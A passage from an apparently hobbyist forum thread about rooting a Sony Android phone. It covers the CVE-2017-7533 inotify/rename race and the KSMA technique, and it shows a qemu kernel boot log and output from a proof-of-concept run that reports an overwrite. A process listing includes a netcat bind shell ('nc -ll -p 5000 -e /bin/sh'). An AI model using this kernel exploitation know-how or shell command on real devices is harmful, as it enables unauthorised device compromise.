handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
...
handle_events() event->name : b, event->len : 16
Detected overwrite!!!
alloc_len : 50
callrename done.
So this could be a way after all even though not easy.
It has been done already, oreo root exploit is existing and it uses the CVE-2017-7533 (race between inotify and rename) as a starting point. Unfortunately the exploit itself is not released yet.
There are slides explaining basics about the exploit available:
asia-18-WANG-KSMA-Breaking-Android-kernel-isolation-and-Rooting-with-ARM-MMU-features.pdf
It continues even with a lot more interesting second stage exploit which mirrors kernel space memory for user space access using forgotten/overlooked feature of arm page table (address translation) setup.
Not sure when the exploit may be released - they are probably holding it back intentionally.
I guess that it will not be released for a long time because the Kernel Space Mirroring Attack is a totally new vulnerability (probably even without CVE yet). So they wait first for CVE assignment and then wait for google to release a fix and wait even more to allow vendors to deploy it to customers.
There are patches to KSMA being discussed on LKML since May 29th so things are moving on.
There's also a demo of the exploit here: https://youtube.com/watch?v=2zGTEv-iUOY
Managed to boot kernel from the 47.1.A.2.281 fw in qemu - dmesg here:
Code:
[ 0.000000] Booting Linux on physical CPU 0x0
[ 0.000000] Initializing cgroup subsys cpuset
[ 0.000000] Initializing cgroup subsys cpu
[ 0.000000] Initializing cgroup subsys cpuacct
[ 0.000000] Initializing cgroup subsys schedtune
[ 0.000000] Linux version 4.4.74-perf+ ([email protected]) (gcc version 4.9.x 20150123 (prerelease) (GCC) ) #1 SMP PREEMPT Wed Aug 9 16:09:57 2017
[ 0.000000] Boot CPU: AArch64 Processor [411fd070]
[ 0.000000] Machine: linux,dummy-virt
[ 0.000000] cma: Reserved 16 MiB at 0x00000000bf000000
[ 0.000000] On node 0 totalpages: 524288
[ 0.000000] DMA zone: 8192 pages used for memmap
[ 0.000000] DMA zone: 0 pages reserved
[ 0.000000] DMA zone: 524288 pages, LIFO batch:31
[ 0.000000] psci: probing for conduit method from DT.
[ 0.000000] psci: PSCIv0.2 detected in firmware.
[ 0.000000] psci: Using standard PSCI v0.2 function IDs
[ 0.000000] psci: Trusted OS migration not required
[ 0.000000] psci: Initializing psci_cpu_init
[ 0.000000] PERCPU: Embedded 21 pages/cpu @ffffffc07efaf000 s47936 r8192 d29888 u86016
[ 0.000000] pcpu-alloc: s47936 r8192 d29888 u86016 alloc=21*4096
[ 0.000000] pcpu-alloc: [0] 0 [0] 1
[ 0.000000] CPU features: enabling workaround for ARM erratum 832075
[ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 516096
[ 0.000000] Kernel command line: nokaslr androidboot.selinux=permissive
[ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes)
[ 0.000000] Dentry cache hash table entries: 262144 (order: 9, 2097152 bytes)
[ 0.000000] Inode-cache hash table entries: 131072 (order: 8, 1048576 bytes)
[ 0.000000] software IO TLB [mem 0xb8a00000-0xbca00000] (64MB) mapped at [ffffffc078a00000-ffffffc07c9fffff]
[ 0.000000] Memory: 1923764K/2097152K available (17918K kernel code, 2652K rwdata, 8904K rodata, 10240K init, 2852K bss, 157004K reserved, 16384K cma-reserved)
[ 0.000000] Virtual kernel memory layout:
[ 0.000000] modules : 0xffffff8000000000 - 0xffffff8008000000 ( 128 MB)
[ 0.000000] vmalloc : 0xffffff8008000000 - 0xffffffbdbfff0000 ( 246 GB)
[ 0.000000] .init : 0xffffff8009c00000 - 0xffffff800a600000 ( 10240 KB)
[ 0.000000] .text : 0xffffff8008080000 - 0xffffff8009200000 ( 17920 KB)
[ 0.000000] .rodata : 0xffffff8009200000 - 0xffffff8009c00000 ( 10240 KB)
[ 0.000000] .data : 0xffffff800a600000 - 0xffffff800a897300 ( 2653 KB)
[ 0.000000] vmemmap : 0xffffffbdc0000000 - 0xffffffbfc0000000 ( 8 GB maximum)
[ 0.000000] 0xffffffbdc0000000 - 0xffffffbdc2000000 ( 32 MB actual)
[ 0.000000] fixed : 0xffffffbffe7fd000 - 0xffffffbffec00000 ( 4108 KB)
[ 0.000000] PCI I/O : 0xffffffbffee00000 - 0xffffffbfffe00000 ( 16 MB)
[ 0.000000] memory : 0xffffffc000000000 - 0xffffffc080000000 ( 2048 MB)
[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1
[ 0.000000] HMP scheduling enabled.
[ 0.000000] Preemptible hierarchical RCU implementation.
[ 0.000000] RCU dyntick-idle grace-period acceleration is enabled.
[ 0.000000] RCU restricting CPUs from NR_CPUS=8 to nr_cpu_ids=2.
[ 0.000000] RCU kthread priority: 1.
[ 0.000000] RCU: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=2
[ 0.000000] NR_IRQS:64 nr_irqs:64 0
[ 0.000000] GICv2m: Node v2m: range[0x8020000:0x8020fff], SPI[80:144]
[ 0.000000] Offload RCU callbacks from all CPUs
[ 0.000000] Offload RCU callbacks from CPUs: 0-1.
[ 0.000000] Architected cp15 timer(s) running at 62.50MHz (virt).
[ 0.000000] clocksource: arch_sys_counter: mask: 0xffffffffffffff max_cycles: 0x1cd42e208c, max_idle_ns: 881590405314 ns
[ 0.000129] sched_clock: 56 bits at 62MHz, resolution 16ns, wraps every 4398046511096ns
[ 0.000754] clocksource: Switched to clocksource arch_sys_counter
[ 0.002862] Calibrating delay loop (skipped), value calculated using timer frequency.. 125.00 BogoMIPS (lpj=625000)
[ 0.003047] pid_max: default: 32768 minimum: 301
[ 0.003929] Security Framework initialized
[ 0.004069] SELinux: Initializing.
[ 0.004522] SELinux: Starting in permissive mode
[ 0.004966] Mount-cache hash table entries: 4096 (order: 3, 32768 bytes)
[ 0.005017] Mountpoint-cache hash table entries: 4096 (order: 3, 32768 bytes)
[ 0.023663] Initializing cgroup subsys memory
[ 0.024136] Initializing cgroup subsys freezer
[ 0.024256] Initializing cgroup subsys debug
[ 0.038338] /cpus/[email protected]: Unknown CPU type
[ 0.038415] /cpus/[email protected]: Unknown CPU type
[ 0.038571] CPU0: update cpu_capacity 1024
[ 0.039453] ASID allocator initialised with 65536 entries
[ 0.078493] mem dump base table DT node does not exist
[ 0.078665] couldn't find /soc/[email protected] node
[ 0.090148] CPU1: update cpu_capacity 1024
[ 0.090682] CPU1: Booted secondary processor [411fd070]
[ 0.095452] Brought up 2 CPUs
[ 0.095541] SMP: Total of 2 processors activated.
[ 0.095833] CPU: All CPU(s) started at EL1
[ 0.096572] alternatives: patching kernel code
[ 0.323842] CPU1: update max cpu_capacity 1024
[ 0.341084] CPU1: update max cpu_capacity 1024
[ 0.351666] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 19112604462750000 ns
[ 0.351818] futex hash table entries: 512 (order: 3, 32768 bytes)
[ 0.357620] pinctrl core: initialized pinctrl subsystem
[ 0.360215] debug region node not found
[ 0.372552] NET: Registered protocol family 16
[ 0.376688] schedtune: init normalization constants...
[ 0.376756] schedtune: disabled!
[ 0.401557] cpuidle: using governor ladder
[ 0.421111] cpuidle: using governor menu
[ 0.441126] cpuidle: using governor qcom
[ 0.441993] vdso: 2 pages (1 code @ ffffff8009206000, 1 data @ ffffff800a604000)
[ 0.447772] DMA: preallocated 256 KiB pool for atomic allocations
[ 0.470943] exit: IPA_USB init success!
[ 0.499315] of_amba_device_create(): amba_device_add() failed (-517) for /[email protected]
[ 0.501005] of_amba_device_create(): amba_device_add() failed (-517) for /[email protected]
[ 0.501372] of_amba_device_create(): amba_device_add() failed (-517) for /[email protected]
[ 0.603967] ACPI: Interpreter disabled.
[ 0.604525] socinfo_init: Can't find SMEM_HW_SW_BUILD_ID; falling back on dummy values.
[ 0.605154] Unknown SOC ID!
[ 0.605447] ------------[ cut here ]------------
[ 0.605487] WARNING: at /home/hudsonslave/root/workspace/offbuild_pre-yoshino2-2.0.0_android_matrix/HUDSON_PRODUCT/lilac/HUDSON_VARIANT/user/label/CM/kernel/msm-4.4/drivers/soc/qcom/socinfo.c:1622
[ 0.605547] Modules linked in:
[ 0.605652]
[ 0.605853] CPU: 1 PID: 1 Comm: swapper/0 Not tainted 4.4.74-perf+ #1
[ 0.605889] Hardware name: linux,dummy-virt (DT)
[ 0.605991] task: ffffffc0784d8000 ti: ffffffc0784b4000 task.ti: ffffffc0784b4000
[ 0.606070] PC is at socinfo_init+0x118/0x7a4
[ 0.606123] LR is at socinfo_init+0x118/0x7a4
[ 0.606153] pc : [<ffffff8009c36b98>] lr : [<ffffff8009c36b98>] pstate: 60400045
[ 0.606177] sp : ffffffc0784b7c80
[ 0.611845] ---[ end trace cf17d4d9cad0286c ]---
[ 0.611997] Call trace:
[ 0.613661] [<ffffff8009c36b98>] socinfo_init+0x118/0x7a4
[ 0.613719] [<ffffff8008083adc>] do_one_initcall+0xc4/0x1dc
[ 0.613771] [<ffffff8009c00e68>] kernel_init_freeable+0x1a8/0x248
[ 0.613810] [<ffffff80091051c4>] kernel_init+0x18/0x138
[ 0.613840] [<ffffff80080830c0>] ret_from_fork+0x10/0x50
[ 0.614477] can't find qcom,msm-imem node
[ 0.614555] socinfo_print: v0.1, id=0, ver=0.1
[ 0.614876] msm_bus_fabric_init_driver
[ 0.617203] vgaarb: loaded
[ 0.619519] SCSI subsystem initialized
[ 0.621504] usbcore: registered new interface driver usbfs
[ 0.621968] usbcore: registered new interface driver hub
[ 0.622562] usbcore: registered new device driver usb
[ 0.623818] media: Linux media interface: v0.10
[ 0.624062] Linux video capture interface: v2.00
[ 0.636355] dev-cpufreq: No tables parsed from DT.
[ 0.637869] Advanced Linux Sound Architecture Driver Initialized.
[ 0.646543] Bluetooth: ffffffc0784b7cf0
[ 0.646800] NET: Registered protocol family 31
[ 0.646850] Bluetooth: ffffffc0784b7cf0
[ 0.647078] Bluetooth: ffffffc0784b7cd0Bluetooth: ffffffc0784b7ca0
[ 0.647570] Bluetooth: ffffffc0784b7cb0<6>[ 0.652956] NetLabel: Initializing
[ 0.653014] NetLabel: domain hash size = 128
[ 0.653038] NetLabel: protocols = UNLABELED CIPSOv4
[ 0.654938] cfg80211: World regulatory domain updated:
[ 0.654992] cfg80211: DFS Master region: unset
[ 0.655037] cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp), (dfs_cac_time)
[ 0.655125] cfg80211: (2402000 KHz - 2472000 KHz @ 20000 KHz), (N/A, 2000 mBm), (N/A)
[ 0.655163] cfg80211: (2457000 KHz - 2482000 KHz @ 20000 KHz), (N/A, 2000 mBm), (N/A)
[ 0.655188] cfg80211: (5170000 KHz - 5250000 KHz @ 80000 KHz), (N/A, 2000 mBm), (N/A)
[ 0.655234] cfg80211: (5250000 KHz - 5330000 KHz @ 80000 KHz), (N/A, 2000 mBm), (0 s)
[ 0.655260] cfg80211: (5490000 KHz - 5730000 KHz @ 80000 KHz), (N/A, 2000 mBm), (0 s)
[ 0.655284] cfg80211: (5735000 KHz - 5835000 KHz @ 80000 KHz), (N/A, 1400 mBm), (N/A)
[ 0.656154] NetLabel: unlabeled traffic allowed by default
[ 0.656738] pcie:pcie_init.
[ 0.662722] clocksource: Switched to clocksource arch_sys_counter
[ 0.879216] pnp: PnP ACPI: disabled
[ 0.883774] NET: Registered protocol family 2
[ 0.891608] TCP established hash table entries: 16384 (order: 5, 131072 bytes)
[ 0.892033] TCP bind hash table entries: 16384 (order: 6, 262144 bytes)
[ 0.892514] TCP: Hash tables configured (established 16384 bind 16384)
[ 0.893122] UDP hash table entries: 1024 (order: 3, 32768 bytes)
[ 0.893331] UDP-Lite hash table entries: 1024 (order: 3, 32768 bytes)
[ 0.895278] NET: Registered protocol family 1
[ 0.895829] PCI: CLS 0 bytes, default 64
[ 0.907093] Trying to unpack rootfs image as initramfs...
[ 1.813394] Freeing initrd memory: 10856K (ffffffc008000000 - ffffffc008a9a000)
[ 1.839873] audit: initializing netlink subsys (disabled)
[ 1.841323] audit: type=2000 audit(1.830:1): initialized
[ 1.843654] Initialise system trusted keyring
[ 1.845285] vmscan: error setting kswapd cpu affinity mask
[ 1.868530] VFS: Disk quotas dquot_6.6.0
[ 1.869111] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
[ 1.877043] Registering sdcardfs 0.1
[ 1.879381] fuse init (API version 7.23)
[ 1.880925] SELinux: Registering netfilter hooks
[ 1.883759] pfk_ecryptfs [pfk_ecryptfs_init]: PFK ecryptfs inited successfully
[ 1.883827] pfk_ext4 [pfk_ext4_init]: PFK EXT4 inited successfully
[ 1.883940] pfk [pfk_init]: Driver initialized successfully
[ 1.906531] Key type asymmetric registered
[ 1.906667] Asymmetric key parser 'x509' registered
[ 1.907447] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 251)
[ 1.907643] io scheduler noop registered
[ 1.907745] io scheduler deadline registered
[ 1.908491] io scheduler cfq registered (default)
[ 1.914647] mdss_dsi_status_init: DSI status check interval:5000
[ 1.924056] _smem_log_init: no log or log_idx allocated
[ 1.924109] smem_log_initialize: init failed -19
[ 1.928406] spcom [spcom_init]: spcom driver Ver 1.0 23-Nov-2015.
[ 1.930476] audio_notifer_reg_service: service SSR_MODEM is in use
[ 1.935741] pil: failed to find qcom,msm-imem-pil node
[ 1.943836] msm_serial: driver initialized
[ 1.944825] msm_serial_hs module loaded
[ 1.999765] diag: Unable to register MHI read channel for 0, err: -22
[ 2.001287] diag: Unable to initialze diagfwd bridge, err: -12
[ 2.006917] Unable to detect cache hierarchy from DT for CPU 0
[ 2.053950] brd: module loaded
[ 2.078315] loop: module loaded
[ 2.081406] zram: Added device: zram0
[ 2.091074] tof_sensor_init: Initialize i2c driver
[ 2.091234] tof_sensor_init: Added i2c driver rc = 0Initialize TCS3490 driver
[ 2.091447] TCS3490 added i2c driver rc = 0<6>[ 2.097314] SCSI Media Changer driver v0.25
[ 2.098726] Ethernet Channel Bonding Driver: v3.7.1 (April 27, 2011)
[ 2.111375] tun: Universal TUN/TAP device driver, 1.6
[ 2.111422] tun: (C) 1999-2004 Max Krasnyansky <[email protected]>
[ 2.111816] sky2: driver version 1.30
[ 2.112935] PPP generic driver version 2.4.2
[ 2.113685] PPP BSD Compression module registered
[ 2.113776] PPP Deflate Compression module registered
[ 2.113968] PPP MPPE Compression module registered
[ 2.114073] NET: Registered protocol family 24
[ 2.121575] usb_host_ext_event has been registered!
[ 2.122073] usbcore: registered new interface driver usb-storage
[ 2.122469] usbcore: registered new interface driver usb_ehset_test
[ 2.125553] msm_sharedmem: sharedmem_register_qmi: qmi init successful
[ 2.126057] diag: failed to find diag_dload imem node
[ 2.128723] mousedev: PS/2 mouse device common for all mice
[ 2.129813] usbcore: registered new interface driver xpad
[ 2.131793] stmvl53l0_init: Enter
[ 2.131865] stmvl53l0_init_cci: Enter
[ 2.132239] stmvl53l0_init_cci: End
[ 2.132288] stmvl53l0_init: End
[ 2.132729] fpc1145_init OK
[ 2.133628] i2c /dev entries driver
[ 2.138308] ------------[ cut here ]------------
[ 2.138340] WARNING: at /home/hudsonslave/root/workspace/offbuild_pre-yoshino2-2.0.0_android_matrix/HUDSON_PRODUCT/lilac/HUDSON_VARIANT/user/label/CM/kernel/msm-4.4/drivers/media/platform/msm/camera_v2/msm.c:401
[ 2.138361] Modules linked in:
[ 2.138390]
[ 2.138527] CPU: 1 PID: 1 Comm: swapper/0 Tainted: G W 4.4.74-perf+ #1
[ 2.138558] Hardware name: linux,dummy-virt (DT)
[ 2.138601] task: ffffffc0784d8000 ti: ffffffc0784b4000 task.ti: ffffffc0784b4000
[ 2.138639] PC is at msm_sd_register+0x198/0x1fc
[ 2.138666] LR is at msm_sensor_init_module+0x114/0x1b8
[ 2.138686] pc : [<ffffff800897d1fc>] lr : [<ffffff8009c47ab0>] pstate: 60400145
[ 2.138701] sp : ffffffc0784b7d20
[ 2.143883] ---[ end trace cf17d4d9cad0286d ]---
[ 2.143920] Call trace:
[ 2.145115] [<ffffff800897d1fc>] msm_sd_register+0x198/0x1fc
[ 2.145153] [<ffffff8009c47ab0>] msm_sensor_init_module+0x114/0x1b8
[ 2.145189] [<ffffff8008083adc>] do_one_initcall+0xc4/0x1dc
[ 2.145225] [<ffffff8009c00e68>] kernel_init_freeable+0x1a8/0x248
[ 2.145262] [<ffffff80091051c4>] kernel_init+0x18/0x138
[ 2.145291] [<ffffff80080830c0>] ret_from_fork+0x10/0x50
[ 2.146752] (NULL device *): sony_sensor_init_module: sony_sensor_init_module platform_driver_probe (0) 2326
[ 2.147185] (NULL device *): sony_sensor_init_module: sony_sensor_init_module platform_driver_probe (1) 2326
[ 2.147237] (NULL device *): sony_sensor_init_module: sony_sensor_init_module platform_driver_probe (0) 2353
[ 2.150963] ------------[ cut here ]------------
[ 2.150994] WARNING: at /home/hudsonslave/root/workspace/offbuild_pre-yoshino2-2.0.0_android_matrix/HUDSON_PRODUCT/lilac/HUDSON_VARIANT/user/label/CM/kernel/msm-4.4/drivers/media/platform/msm/camera_v2/msm.c:401
[ 2.151014] Modules linked in:
[ 2.151040]
[ 2.151073] CPU: 1 PID: 1 Comm: swapper/0 Tainted: G W 4.4.74-perf+ #1
[ 2.151093] Hardware name: linux,dummy-virt (DT)
[ 2.151115] task: ffffffc0784d8000 ti: ffffffc0784b4000 task.ti: ffffffc0784b4000
[ 2.151147] PC is at msm_sd_register+0x198/0x1fc
[ 2.151173] LR is at msm_buf_mngr_init+0x114/0x200
[ 2.151192] pc : [<ffffff800897d1fc>] lr : [<ffffff8009c484e8>] pstate: 60400145
[ 2.151208] sp : ffffffc0784b7d20
[ 2.156095] ---[ end trace cf17d4d9cad0286e ]---
[ 2.156117] Call trace:
[ 2.157240] [<ffffff800897d1fc>] msm_sd_register+0x198/0x1fc
[ 2.157275] [<ffffff8009c484e8>] msm_buf_mngr_init+0x114/0x200
[ 2.157307] [<ffffff8008083adc>] do_one_initcall+0xc4/0x1dc
[ 2.157340] [<ffffff8009c00e68>] kernel_init_freeable+0x1a8/0x248
[ 2.157373] [<ffffff80091051c4>] kernel_init+0x18/0x138
[ 2.157401] [<ffffff80080830c0>] ret_from_fork+0x10/0x50
[ 2.157447] CAM-BUFMGR msm_buf_mngr_init:863 msm_buf_mngr_init: msm_sd_register error = -5
[ 2.164607] tsens_controller_is_present: tsens_controller_is_present: TSENS controller not available
[ 2.164687] _tsens_register_thermal: _tsens_register_thermal: TSENS early init not done
[ 2.165473] md: linear personality registered for level -1
[ 2.166120] device-mapper: uevent: version 1.0.3
[ 2.167337] device-mapper: ioctl: 4.34.0-ioctl (2015-10-28) initialised: [email protected]
[ 2.168421] device-mapper: req-crypt: dm-req-crypt successfully initalized.
[ 2.168421]
[ 2.170719] sdhci: Secure Digital Host Controller Interface driver
[ 2.170754] sdhci: Copyright(c) Pierre Ossman
[ 2.170813] sdhci-pltfm: SDHCI platform and OF driver helper
[ 2.175886] usbcore: registered new interface driver usbhid
[ 2.175928] usbhid: USB HID core driver
[ 2.176592] ashmem: initialized
[ 2.192929] hw perfevents: enabled with armv8_pmuv3 PMU driver, 1 counters available
[ 2.203890] usbcore: registered new interface driver snd-usb-audio
[ 2.225873] sony_hweffect_params_init
[ 2.228462] GACT probability NOT on
[ 2.228790] Mirror/redirect action on
[ 2.229052] u32 classifier
[ 2.229080] Actions configured
[ 2.229531] Netfilter messages via NETLINK v0.30.
[ 2.230447] nf_conntrack version 0.5.0 (16384 buckets, 65536 max)
[ 2.234582] ctnetlink v0.93: registering with nfnetlink.
[ 2.240127] xt_time: kernel timezone is -0000
[ 2.243542] ip_tables: (C) 2000-2006 Netfilter Core Team
[ 2.248215] arp_tables: (C) 2002 David S. Miller
[ 2.249607] Initializing XFRM netlink socket
[ 2.252047] NET: Registered protocol family 10
[ 2.262166] mip6: Mobile IPv6
[ 2.262432] ip6_tables: (C) 2000-2006 Netfilter Core Team
[ 2.264716] sit: IPv6 over IPv4 tunneling driver
[ 2.267729] NET: Registered protocol family 17
[ 2.268306] NET: Registered protocol family 15
[ 2.268815] bridge: automatic filtering via arp/ip/ip6tables has been deprecated. Update your scripts to load br_netfilter if you need this.
[ 2.268915] Ebtables v2.0 registered
[ 2.269846] l2tp_core: L2TP core driver, V2.0
[ 2.270120] l2tp_ppp: PPPoL2TP kernel driver, V2.0
[ 2.270188] l2tp_ip: L2TP IP encapsulation support (L2TPv3)
[ 2.270361] l2tp_netlink: L2TP netlink interface
[ 2.270880] l2tp_eth: L2TP ethernet pseudowire support (L2TPv3)
[ 2.270955] l2tp_ip6: L2TP IP encapsulation support for IPv6 (L2TPv3)
[ 2.271666] NET: Registered protocol family 27
[ 2.288350] Registered cp15_barrier emulation handler
[ 2.288510] Registered setend emulation handler
[ 2.291405] registered taskstats version 1
[ 2.291648] Loading compiled-in X.509 certificates
[ 2.302327] Loaded X.509 cert 'Build time autogenerated kernel key: 70cf1635829ba84ab2643804f0666714b694ca11'
[ 2.304493] Loaded X.509 cert 'Android: 7e4333f9bba00adfe0ede979e28ed1920492b40f'
[ 2.543600] Key type encrypted registered
[ 2.545603] modem_restart_late_init: Unable to create smem ramdump device.
[ 2.546929] spss_utils [spss_init]: spss-utils driver Ver 1.2 13-Jan-2017.
[ 2.547854] servloc: init_service_locator: Service Locator not enabled
[ 2.547905] servloc: pd_locator_work: Unable to connect to service locator!, rc = -19
[ 2.548122] audio_notifer_reg_service: service SSR_ADSP is in use
[ 2.558173] RNDIS_IPA module is loaded.
[ 2.560110] hctosys: unable to open rtc device (rtc0)
[ 2.568247] clock_late_init: Removing enables held for handed-off clocks
[ 2.568376] ALSA device list:
[ 2.568423] No soundcards found.
[ 2.569282] Warning: unable to open an initial console.
[ 2.706130] Freeing unused kernel memory: 10240K ...
Here are a few Linux commands from the Linux shell under that kernel in qemu:
Code:
ps
PID USER COMMAND
1 0 init
2 0 [kthreadd]
3 0 [ksoftirqd/0]
4 0 [kworker/0:0]
5 0 [kworker/0:0H]
6 0 [kworker/u4:0]
7 0 [rcu_preempt]
8 0 [rcu_sched]
9 0 [rcu_bh]
10 0 [rcuop/0]
11 0 [rcuos/0]
12 0 [rcuob/0]
13 0 [rcuc/0]
14 0 [rcub/0]
15 0 [migration/0]
16 0 [migration/1]
17 0 [rcuc/1]
18 0 [ksoftirqd/1]
19 0 [kworker/1:0]
20 0 [kworker/1:0H]
21 0 [rcuop/1]
22 0 [rcuos/1]
23 0 [rcuob/1]
24 0 [netns]
25 0 [perf]
26 0 [smd_channel_clo]
27 0 [dsps_smd_trans_]
28 0 [lpass_smd_trans]
29 0 [mpss_smd_trans_]
30 0 [wcnss_smd_trans]
31 0 [rpm_smd_trans_g]
32 0 [ipa_usb_wq]
33 0 [deferwq]
34 0 [kworker/u4:1]
35 0 [writeback]
36 0 [kcompactd0]
37 0 [crypto]
38 0 [bioset]
39 0 [kblockd]
40 0 [md]
41 0 [devfreq_wq]
42 0 [governor_msm_ad]
43 0 [kworker/1:1]
44 0 [cfg80211]
45 0 [kworker/0:1]
71 0 [power_off_alarm]
72 0 [kswapd0]
73 0 [vmstat]
74 0 [fsnotify_mark]
75 0 [ecryptfs-kthrea]
107 0 [glink_ssr_wq]
108 0 [glink_lbsrv]
109 0 [glink_xprt_wq]
110 0 [apr_driver]
111 0 [glink_pkt_wq]
113 0 [diag_real_time_]
114 0 [diag_wq]
115 0 [DIAG_USB_diag]
116 0 [diag_cntl_wq]
117 0 [diag_dci_wq]
118 0 [DIAG_SMD_MODEM_]
119 0 [DIAG_SMD_MODEM_]
120 0 [DIAG_SMD_MODEM_]
121 0 [DIAG_SMD_MODEM_]
122 0 [DIAG_SMD_MODEM_]
123 0 [DIAG_SMD_LPASS_]
124 0 [DIAG_SMD_LPASS_]
125 0 [DIAG_SMD_LPASS_]
126 0 [DIAG_SMD_LPASS_]
127 0 [DIAG_SMD_LPASS_]
128 0 [DIAG_SMD_WCNSS_]
129 0 [DIAG_SMD_WCNSS_]
130 0 [DIAG_SMD_WCNSS_]
131 0 [DIAG_SMD_WCNSS_]
132 0 [DIAG_SMD_WCNSS_]
133 0 [DIAG_SMD_SENSOR]
134 0 [DIAG_SMD_SENSOR]
135 0 [DIAG_SMD_SENSOR]
136 0 [DIAG_SMD_SENSOR]
137 0 [DIAG_SMD_SENSOR]
138 0 [DIAG_SMD_DIAG_C]
139 0 [DIAG_SMD_DIAG_D]
140 0 [DIAG_SMD_DIAG_C]
141 0 [DIAG_SMD_DIAG_D]
142 0 [DIAG_SMD_DIAG_D]
143 0 [DIAG_SMD_CDSP_C]
144 0 [DIAG_SMD_CDSP_D]
145 0 [DIAG_SMD_CDSP_C]
146 0 [DIAG_SMD_CDSP_D]
147 0 [DIAG_SMD_CDSP_D]
148 0 [DIAG_SOCKMODEM_]
149 0 [DIAG_SOCKMODEM_]
150 0 [DIAG_SOCKMODEM_]
151 0 [DIAG_SOCKMODEM_]
152 0 [DIAG_SOCKMODEM_]
153 0 [DIAG_SOCKLPASS_]
154 0 [DIAG_SOCKLPASS_]
155 0 [DIAG_SOCKLPASS_]
156 0 [DIAG_SOCKLPASS_]
157 0 [DIAG_SOCKLPASS_]
158 0 [DIAG_SOCKWCNSS_]
159 0 [DIAG_SOCKWCNSS_]
160 0 [DIAG_SOCKWCNSS_]
161 0 [DIAG_SOCKWCNSS_]
162 0 [DIAG_SOCKWCNSS_]
163 0 [DIAG_SOCKSENSOR]
164 0 [DIAG_SOCKSENSOR]
165 0 [DIAG_SOCKSENSOR]
166 0 [DIAG_SOCKSENSOR]
167 0 [DIAG_SOCKSENSOR]
168 0 [DIAG_SOCKDIAG_C]
169 0 [DIAG_SOCKDIAG_D]
170 0 [DIAG_SOCKDIAG_C]
171 0 [DIAG_SOCKDIAG_D]
172 0 [DIAG_SOCKDIAG_D]
173 0 [DIAG_SOCKCDSP_C]
174 0 [DIAG_SOCKCDSP_D]
175 0 [DIAG_SOCKCDSP_C]
176 0 [DIAG_SOCKCDSP_D]
177 0 [DIAG_SOCKCDSP_D]
178 0 [DIAG_CNTL_SOCKE]
179 0 [DIAG_GLINK_DIAG]
180 0 [DIAG_GLINK_DIAG]
181 0 [DIAG_GLINK_DIAG]
182 0 [DIAG_GLINK_DIAG]
183 0 [DIAG_GLINK_DIAG]
185 0 [DIAG_USB_diag_m]
186 0 [kgsl-workqueue]
187 0 [kgsl-mementry]
188 0 [kgsl_worker_thr]
189 0 [bioset]
190 0 [bioset]
191 0 [bioset]
192 0 [bioset]
193 0 [bioset]
194 0 [bioset]
195 0 [bioset]
196 0 [bioset]
197 0 [bioset]
198 0 [bioset]
199 0 [bioset]
200 0 [bioset]
201 0 [bioset]
202 0 [bioset]
203 0 [bioset]
204 0 [bioset]
205 0 [bioset]
206 0 [bioset]
207 0 [bioset]
208 0 [bioset]
209 0 [bioset]
210 0 [bioset]
211 0 [bioset]
212 0 [bioset]
213 0 [bioset]
214 0 [memory_wq]
215 0 [qcrypto_seq_res]
216 0 [bond0]
217 0 [sharedmem_qmi_w]
218 0 [qmi_hndl0000000]
219 0 [msm_ipc_router]
220 0 [uether]
221 0 [k_ipa_usb]
222 0 [dm_bufio_cache]
223 0 [binder]
224 0 [hwbinder]
225 0 [vndbinder]
226 0 [uaudio_svc]
227 0 [qmi_hndl0000000]
228 0 [ipv6_addrconf]
229 0 [kworker/u4:2]
238 0 [msm_perf:events]
239 0 [rq_stats]
340 0 nc -ll -p 5000 -e /bin/sh
341 0 /bin/sh
344 0 ps
cat /proc/version
Linux version 4.4.74-perf+ ([email protected]) (gcc version 4.9.x 20150123 (prerelease) (GCC) ) #1 SMP PREEMPT Wed Aug 9 16:09:57 2017
cat /proc/cpuinfo
Processor : AArch64 Processor rev 0 (aarch64)
processor : 0
BogoMIPS : 125.00
Features : fp asimd evtstrm aes pmull sha1 sha2 crc32
CPU implementer : 0x41
CPU architecture: 8
CPU variant : 0x1
CPU part : 0xd07
CPU revision : 0
processor : 1
BogoMIPS : 125.00
Features : fp asimd evtstrm aes pmull sha1 sha2 crc32
CPU implementer : 0x41
CPU architecture: 8
CPU variant : 0x1
CPU part : 0xd07
CPU revision : 0
Hardware : Qualcomm Technologies, Inc Unknown CPU
Tried also again the inotify/rename poc, this time built statically for linux:
Code:
/exploit-aarch64-linux-gnu
Listening for events.
Listening for events.
alloc_len : 50
longname="test_dir/bbbb32103210321032100��1����"
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
